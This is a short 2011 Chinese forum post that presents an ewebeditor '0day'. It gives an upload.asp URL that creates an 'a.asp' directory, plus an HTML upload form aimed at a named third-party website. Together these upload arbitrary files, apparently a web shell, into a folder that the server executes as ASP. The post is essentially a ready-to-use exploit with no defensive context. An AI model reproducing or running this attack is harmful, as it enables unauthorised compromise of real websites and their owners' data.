琼殿技术论坛

琼殿技术论坛»首页 › IT技术/使用交流 › 电脑病毒论坛 › ewebeditor通杀鸡肋0day漏洞

返回列表发新帖

查看: 92|回复: 0

[漏洞分析] ewebeditor通杀鸡肋0day漏洞

4 主题	0 回帖	0 积分

金币: 0
阅读权限: 220
精华: 0
威望: 0
贡献: 0
在线时间: 0 小时
注册时间: 2011-2-20

发消息

发表于 2011-3-11 11:59:01 | 显示全部楼层 |阅读模式

先访问这个地址
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp
访问这个地址可以建立个A.ASP的文件夹……
再用这个html代码上传。

<form action="http://www.zzfhw.com/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>

回复

使用道具举报

返回列表发新帖

Archiver|手机版|小黑屋|琼殿技术论坛 |nimba_sitemap:appname

相关侵权、举报、投诉及建议等，请发 E-mail：qiongdian@foxmail.com

Powered by Discuz! X5.0 © 2001-2026 Discuz! Team.

在本版发帖返回顶部